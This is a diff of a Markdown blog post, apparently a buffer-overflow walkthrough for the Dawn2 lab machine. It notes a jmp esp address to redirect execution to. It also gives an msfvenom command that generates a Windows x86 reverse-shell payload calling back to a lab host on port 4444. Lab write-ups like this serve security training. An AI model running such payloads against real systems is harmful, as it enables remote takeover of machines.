kali-mx/BlogContent/Dawn2_BOF.md

 The output shows us a viable pointer location at 0x345964ba.
 We can point our BOF to end up at this address, containing a jmp instruction
 ![jmpesp](https://user-images.githubusercontent.com/76034874/181870587-18478525-0d60-4cd5-9e6b-81ed35f016b5.png)

-# Generating the reverse shell
+## 7) Generating the reverse shell
 We use msfvenom.
-Our test target is windows and it is an x86 binary: msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.0.2.30 LPORT=4444 -f py -b '\x00' EXITFUNC=thread -v shellcode
+Our test target is windows and it is an x86 binary.
+Rule of thumb: match the payload to the OS of the target but the arch of the binary. msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.0.2.30 LPORT=4444 -f py -b '\x00' EXITFUNC=thread -v shellcode

 ```python